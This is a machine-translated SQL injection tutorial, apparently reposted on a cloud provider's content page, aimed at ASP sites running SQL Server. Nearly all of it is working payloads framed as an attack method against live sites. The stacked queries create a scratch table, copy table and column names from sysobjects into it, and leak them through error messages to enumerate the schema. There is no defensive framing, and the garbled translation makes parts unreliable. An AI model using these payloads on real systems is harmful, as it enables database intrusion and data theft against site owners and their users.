Summary of uncommon SQL Script Injection Methods

Source: Internet
Author: User
Have you ever met such a site? ArticleThe system uses the HTML file generated statically by FSO to display the file. This can reduce the server load and increase the access speed. Second, it also stops SQLInjection attacks.

Let me talk about their article system principle: all the articles are inDatabaseThere is a copy. In addition, an HTML page is generated based on the template.

Attack method: Check the source file/check whether there is a page called through Js. For example, call to update the browsing times of an article.

Can we try to inject: http: // server domain name/count. asp? Id = 1552

Check whether an error occurs. If an error occurs, the injection vulnerability exists. Then the attack is normal.

Create a post.htmfile and a log.txt text file on the local machine (this is a good habit)

Post.htm content: easy to input.

The SQL Server server can be judged as follows: add a semicolon after 1552. If it is normal, it may be SQL Server.

For such databases, You can first create a table id = 1552; Create Table AAA (AAA char (20 ));--

Insert a record: Id = 1552; insert into AAA values ('test ');--

Next, I will name his data table:

Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 );--

This is to update the first table name to the AAA field.

Id = 1552 and exists (select * from AAA where AAA> 5) will report an error. In most cases, the table name will be read directly:

Microsoft ole db provider for SQL Server Error '80040e07'

A syntax error occurs when the varchar value 'Vote' is converted to a column whose data type is int.

/Search. asp, row 21

Here, vote is the table name:

You can also guess a table name first, and then update the values of (select top 1 name from sysobjects where xtype = 'U' and status> 0) to a record of that table. Display on the webpage.

Read the first table, and the second table can be read as follows (ADD and name <> 'table name just obtained 'After the condition ').

Id = 1552; update AAA set AAA = (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name <> 'Vote ');--

Then Id = 1552 and exists (select * from AAA where AAA> 5)

Read the second table and read it one by one until it does not exist.

The read field is as follows:

Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 1 ));--

Then Id = 1552 and exists (select * from AAA where AAA> 5) error.

Id = 1552; update AAA set AAA = (select top 1 col_name (object_id ('table name'), 2 ));--

Then Id = 1552 and exists (select * from AAA where AAA> 5) error.

...... And so on

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.